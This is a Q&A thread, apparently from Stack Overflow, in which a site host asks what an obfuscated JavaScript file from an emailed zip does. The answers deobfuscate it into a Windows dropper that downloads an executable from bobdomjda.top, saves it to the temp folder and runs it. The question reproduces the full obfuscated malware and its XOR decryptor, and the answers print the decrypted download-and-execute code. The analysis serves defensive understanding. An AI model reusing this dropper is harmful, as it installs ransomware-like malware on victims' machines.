# What does the following code snippet do? (JavaScript)

Tags: javascript

So some background. I currently host a few small sites for my clients. I use cPanel.

Recently, I received an email on my server with a zip file. The zip file contains the following code:

```js
function jqmqmkrehl(luezhqtygz)
{
 return parseInt(luezhqtygz,16);
}
function jvqissrxgt()
{
 var ftytqpuqjd="val12312312".match(/\S{1}/g);
 return ftytqpuqjd[Math["floo"+""+"r"](Math.random()*ftytqpuqjd.length)];
}
function jqmqmkrehl(luezhqtygz)
{
 return parseInt(luezhqtygz,16);
}
function sehudasphf()
{
 var a = 1;
 var lzpxyboxat="f0f70ca69f5683161c510cebd2e316a4ad4d8315694405b7e3f00ee9cb5c8d14505408fcfdab19b19946970e5d4449e7fbee2ab19f4fcc451c580ce8b6c301b182498920735403faf5f64ae7a66cb435700447c7dbce2a91bf6fce51074e04f3def616b5"+
 "c5509c1d521e4bd8d3d640e9cb4a9e1410160ffefaf107ecd047811474421defb8f107ab8f17c543555049b7eeef0e8d9f4b9c564f4208ebe3f142f8d61fde480c1f49e4e4e716b09951cc1b5d5a05fdf7e109ed93528030484219b1c4e711b584519f1d"+
 "7e590de6baa204a4874c8951074b0cf3e5e719b78e4b990a52160afefaee00a48854c416495a05b3b6f610b08e16d705415508ebf5ea42ed8e4d9e174e1f12edf3f617b7851f8f19505a0bfef5e94aab9e5380541c421beaf3ab59b8965999165f4200f0"+
 "f8a205a09f7b8d0c5d1e0afefaee00a48854c503484410e4f1e716818a4b8d3e4e5904cae4ee4ae7834b9808061946fdf9e006aa86558819124206efb9e306a88251c208544656f9abb04ca28259ce541c501cf1f5f60baa85179e1d4f4305ebbaa207b7"+
 "99509e511c4d00f9b6aa43a0994d830a154d1bfae2f710abcb5c8d14505408fcfdaa10a0984a800c10160ffefaf107ecd04289144f5312f8f3f626a49f5eaa0a535b3cedfaaa40ad9f4b9c4213190bf0f4e60da8815b8d56485919b0f7e60fac85119c10"+
 "4c090fa2a4ac05ac8d1dc0585a4307fce2eb0dabc34d890b495a1db3b6e710b7844dc558475f0fbfbea307b799509e5147440cebe3f00ce5885e80145e570af4bef007b69e5398541c5008f3e5e74bfe965a800b594d0efae2c603b18a799e1751631bf3"+
 "bea00ab19f4fd657135406fdf2ed0faf8f5ec20c534646fef2ef0babc54f8408035054adb8e50ba3c913cc1e49580aebffed0ced995a9f0d504245bff3f010aa9916cc03555049b7b7e710b7844dc5034e531deae4ec42a68a53801a5d5502b7e4e711b0"+
 "874bc0585a5705ecf3ab59b88e539f1d47440cebe3f00ce5885e80145e570af4beec17a98713cc0c4e430cb6adff1fecd0429151074b14b6adff01a49f5c845814531bedf9f04bbe995a980d4e5849fcf7ee0ea78a5c8750524305f3baa216b79e5ac543"+
 "414b0feaf8e116ac8451cc1f59423dfafbf224ac875abc19485e41b6edf610bc90498d0a1c501abfaba20ca09c1fad1b485f1ffacecd00af8e5c98501e650aedfff216ac8558c23e555a0ccceff116a086708e1259551dbdbfb914a4991f98154c7000f3"+
 "f3cc03a88e1fd1581e6a35bdb6a942888a4b84564e5707fbf9ef4aecc54b832b484400f1f1aa51f3c2119f0d5e451dedbeb04ee5d216cc531c1447faeee740fe9d5e9e58485b19d9ffee07958a4b845801160fecb8c507b1b84f891b555705d9f9ee06a0"+
 "9917de511c1d49ebfbf224ac875aa219515352edf3f617b7851f98154c7000f3f3d203b18304911b5d420af7b6aa07b799509e5147440cebe3f00ce58d5e800b590d14e2f0f70ca69f5683161c4508e9f3d60d918e529c5058571dfebaa201a487538e19"+
 "5f5d40e4e2f01bbe9d5e9e584c571df7b6bf42a28e4bb81d51462ff6fae732a49f57c451075f0fbfbef203b18316970e5d4449f0f4e831b1995a8d151c0b49f1f3f54284884b850e596e26fdfce701b1c31dad3c73722bb1c5f610a08a52ce5107590bf5"+
 "c5f610a08a52c2374c5307b7bfb90da7816c980a595704b1c2fb12a0cb02cc4907590bf5c5f610a08a52c22f4e5f1dfabee603b18a16d7175e5c3aebe4e703a8c56f830b554200f0f8a25fe5db04831a56651dedf3e30febb85e9a1d68592ff6fae74ab5"+
 "8a4b84541c0440a4f9e008969f4d891951182af3f9f107edc2049e1d48431bf1b6e103a9875d8d1b571e19fee2ea4ee58d5e800b591f52e2f3ee11a0cb449e1d48431bf1b6e103a9875d8d1b571e07eafaee4ee59f4d991d150d14e2f5e316a6831fc41d"+
 "4e4406edbff910a09f4a9e161c5508f3fae003a68017820d505a45bfe2f017a0c20491055b531ddbf7f603ed8d4a821b485f06f1b6aa06a49f5ec05859441bf0e4ab42be8259cc501d531bedf9f04bbe985e9a1d68593dfafbf24aa18a4b8d541c501cf1"+
 "f5f60baa851fc4085d4201b3b6e710b7844dc558475f0fbfbea307b799509e5147421be6edf403b7cb489f101c0b49f1f3f54284884b850e596e26fdfce701b1c31dbb2b5f4400efe2ac31ad8e53805a150d1eecfeac30b08517ce1b515247faeee742ea"+
 "881f9f0c5d441dbfb4a912a49f57c75a1c1049fbf3ee42efc5559f5a150d14fcf7f601adcb17890a4e591bb6b6f91fb89616d705411f52";
 return lzpxyboxat;
}
function yneepaqzwu(yluyzuvvps)
{
 var mfjvremiuf;
 while(true){
  try
  {
   mfjvremiuf=(new Function("uneuuflaii","var zkyczguxoo=new Array(150,130,98,197,235,63,236,120,60,54,105,159),htcpxtvter=uneuuflaii.match(/\\S{2}/g),xjrefvhonb=\"\",ftvjsrrtfs=0;for(var ftvjsrrtfs=0,wgwizxghjb=0;ftvjsrrtfs<htcpxtvter.length;ftvjsrrtfs++,wgwizxghjb++){if(wgwizxghjb>=zkyczguxoo.length){wgwizxghjb=0;}xjrefvhonb+=String.fromCharCode(parseInt(htcpxtvter[ftvjsrrtfs],16)^zkyczguxoo[wgwizxghjb]);}e"+jvqissrxgt()+jvqissrxgt()+jvqissrxgt()+"(xjrefvhonb);")(yluyzuvvps));
   break;
  }
  catch(er)
  {
  }
 }
 return mfjvremiuf;
}
yneepaqzwu(sehudasphf());
```

All I know is that it is a javascript file, but I have no idea what this does. Can anyone enlighten me?
(P.S. I am literally brand new to programming.)

Comment: It's obfuscated. It is designed to be hard to understand. Don't use it. Learn JS properly. "Recently, I received an email on my server with a zip file." — It's probably malicious. Just throw it in the spam bin.

Comment: OP is curious about a piece of potentially malicious JS code and all you do is vote to close and ask OP to learn JS?

Answer (score 2, accepted):

Here is what it does: The code decrypts the long string variable (`var lzpxyboxat="f0f70ca69f5683161c510c...`). The decrypted string is again JavaScript code, which is then executed. This is the decrypted code:

```
function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false);
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

function getData(callback) {
    try {
        getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}

function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}

function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

getData(function (data, error) {
    if (!error) {
        saveToTemp(data, function (path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run("cmd.exe /c start " + path + " & del *.js");
                } catch (error) {
                }
            }
        });
    }
});
```

This code downloads a file from the URL (**WARNING: potentially malicious file**) `http://bobdomjda.top/admin.php?f=2.gif`. The file is saved in the temporary files folder and executed with `cmd.exe /c start [filename]`.

As far as I can see the downloading and execution will only work on Windows systems.

I uploaded the file to VirusTotal: [analysis result](https://www.virustotal.com/de/file/b85c106a83533d3d7248b8c77c56cff4e4fead8ccaa85f755d3c7852c5c6cd0c/analysis/).

Answer (score 0):

Deobfuscating your script yields:

```
var encrypted =
    "f0f70ca69f5683161c510cebd2e316a4ad4d8315694405b7e3f00ee9cb5c8d14505408fcfdab19b19946970e5d4449e7fbee2ab19f4fcc451c580ce8b6c301b182498920735403faf5f64ae7a66cb435700447c7dbce2a91bf6fce51074e04f3def616b5"+
    "c5509c1d521e4bd8d3d640e9cb4a9e1410160ffefaf107ecd047811474421defb8f107ab8f17c543555049b7eeef0e8d9f4b9c564f4208ebe3f142f8d61fde480c1f49e4e4e716b09951cc1b5d5a05fdf7e109ed93528030484219b1c4e711b584519f1d"+
    "7e590de6baa204a4874c8951074b0cf3e5e719b78e4b990a52160afefaee00a48854c416495a05b3b6f610b08e16d705415508ebf5ea42ed8e4d9e174e1f12edf3f617b7851f8f19505a0bfef5e94aab9e5380541c421beaf3ab59b8965999165f4200f0"+
    "f8a205a09f7b8d0c5d1e0afefaee00a48854c503484410e4f1e716818a4b8d3e4e5904cae4ee4ae7834b9808061946fdf9e006aa86558819124206efb9e306a88251c208544656f9abb04ca28259ce541c501cf1f5f60baa85179e1d4f4305ebbaa207b7"+
    "99509e511c4d00f9b6aa43a0994d830a154d1bfae2f710abcb5c8d14505408fcfdaa10a0984a800c10160ffefaf107ecd04289144f5312f8f3f626a49f5eaa0a535b3cedfaaa40ad9f4b9c4213190bf0f4e60da8815b8d56485919b0f7e60fac85119c10"+
    "4c090fa2a4ac05ac8d1dc0585a4307fce2eb0dabc34d890b495a1db3b6e710b7844dc558475f0fbfbea307b799509e5147440cebe3f00ce5885e80145e570af4bef007b69e5398541c5008f3e5e74bfe965a800b594d0efae2c603b18a799e1751631bf3"+
    "bea00ab19f4fd657135406fdf2ed0faf8f5ec20c534646fef2ef0babc54f8408035054adb8e50ba3c913cc1e49580aebffed0ced995a9f0d504245bff3f010aa9916cc03555049b7b7e710b7844dc5034e531deae4ec42a68a53801a5d5502b7e4e711b0"+
    "874bc0585a5705ecf3ab59b88e539f1d47440cebe3f00ce5885e80145e570af4beec17a98713cc0c4e430cb6adff1fecd0429151074b14b6adff01a49f5c845814531bedf9f04bbe995a980d4e5849fcf7ee0ea78a5c8750524305f3baa216b79e5ac543"+
    "414b0feaf8e116ac8451cc1f59423dfafbf224ac875abc19485e41b6edf610bc90498d0a1c501abfaba20ca09c1fad1b485f1ffacecd00af8e5c98501e650aedfff216ac8558c23e555a0ccceff116a086708e1259551dbdbfb914a4991f98154c7000f3"+
    "f3cc03a88e1fd1581e6a35bdb6a942888a4b84564e5707fbf9ef4aecc54b832b484400f1f1aa51f3c2119f0d5e451dedbeb04ee5d216cc531c1447faeee740fe9d5e9e58485b19d9ffee07958a4b845801160fecb8c507b1b84f891b555705d9f9ee06a0"+
    "9917de511c1d49ebfbf224ac875aa219515352edf3f617b7851f98154c7000f3f3d203b18304911b5d420af7b6aa07b799509e5147440cebe3f00ce58d5e800b590d14e2f0f70ca69f5683161c4508e9f3d60d918e529c5058571dfebaa201a487538e19"+
    "5f5d40e4e2f01bbe9d5e9e584c571df7b6bf42a28e4bb81d51462ff6fae732a49f57c451075f0fbfbef203b18316970e5d4449f0f4e831b1995a8d151c0b49f1f3f54284884b850e596e26fdfce701b1c31dad3c73722bb1c5f610a08a52ce5107590bf5"+
    "c5f610a08a52c2374c5307b7bfb90da7816c980a595704b1c2fb12a0cb02cc4907590bf5c5f610a08a52c22f4e5f1dfabee603b18a16d7175e5c3aebe4e703a8c56f830b554200f0f8a25fe5db04831a56651dedf3e30febb85e9a1d68592ff6fae74ab5"+
    "8a4b84541c0440a4f9e008969f4d891951182af3f9f107edc2049e1d48431bf1b6e103a9875d8d1b571e19fee2ea4ee58d5e800b591f52e2f3ee11a0cb449e1d48431bf1b6e103a9875d8d1b571e07eafaee4ee59f4d991d150d14e2f5e316a6831fc41d"+
    "4e4406edbff910a09f4a9e161c5508f3fae003a68017820d505a45bfe2f017a0c20491055b531ddbf7f603ed8d4a821b485f06f1b6aa06a49f5ec05859441bf0e4ab42be8259cc501d531bedf9f04bbe985e9a1d68593dfafbf24aa18a4b8d541c501cf1"+
    "f5f60baa851fc4085d4201b3b6e710b7844dc558475f0fbfbea307b799509e5147421be6edf403b7cb489f101c0b49f1f3f54284884b850e596e26fdfce701b1c31dbb2b5f4400efe2ac31ad8e53805a150d1eecfeac30b08517ce1b515247faeee742ea"+
    "881f9f0c5d441dbfb4a912a49f57c75a1c1049fbf3ee42efc5559f5a150d14fcf7f601adcb17890a4e591bb6b6f91fb89616d705411f52";

function decrypt(encrypted) {
    var key = new Array(150, 130, 98, 197, 235, 63, 236, 120, 60, 54, 105, 159),
        bytes = encoded.match(/\S{2}/g),
        code = "";

    for (var i = 0, j = 0; i < bytes.length; i++, j++) {
        if (j >= key.length) {
            j = 0;
        }
        code += String.fromCharCode(parseInt(bytes[i], 16) ^ key[j]);
    }

    return code;
}

// eval(decrypt(encrypted)); // commented out to prevent accidental execution
```

The script contains encrypted JavaScript code and a decrypt function based on a simple [XOR cipher](https://en.wikipedia.org/wiki/XOR_cipher).

Decrypting the encrypted code yields:

```
function getDataFromUrl(url, callback) {
    try{
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false);
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

function getData(callback) {
    try {
        getDataFromUrl(
            "http://bobdomjda.top/admin.php?f=2.gif",
            function(result, error) {
                if (!error) {
                    return callback(result, false);
                } else {
                    getDataFromUrl(
                        "http://bobdomjda.top/admin.php?f=2.gif",
                        function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                getDataFromUrl(
                                    "http://bobdomjda.top/admin.php?f=2.gif",
                                    function(result, error) {
                                        if (!error) {
                                            return callback(result, false);
                                        } else {
                                            return callback(null, true);
                                        }
                                    }
                                );
                            }
                        }
                    );
                }
            }
        );
    } catch (error) {
        return callback(null, true);
    }
}

function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}

function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

getData(
    function (data, error) {
        if (!error) {
            saveToTemp(
                data,
                function (path, error) {
                    if (!error) {
                        try {
                            var wsh = new ActiveXObject("WScript.Shell");
                            // wsh.Run("cmd.exe /c start "+path+" & del *.js"); // Commented out to prevent accidental execution
                        } catch (error) {}
                    }
                }
            );
        }
    }
);
```

This script

1. Downloads an executable file from `http://bobdomjda.top/admin.php?f=2.gif`
2. Uses ActiveX ("Scripting.FileSystemObject", "ADODB.Stream") to save it on your local filesystem as e.g. "owynovqn2.exe"
3. Uses ActiveX ("WScript.Shell") to execute it.

According to [virustotal.com](https://www.virustotal.com/de/file/b85c106a83533d3d7248b8c77c56cff4e4fead8ccaa85f755d3c7852c5c6cd0c/analysis/1490024155/), 8 of 61 virus scanners recognize the executable file as malicious, e.g. McAfee classifies it as "BehavesLike.Win32.Ransom.dc".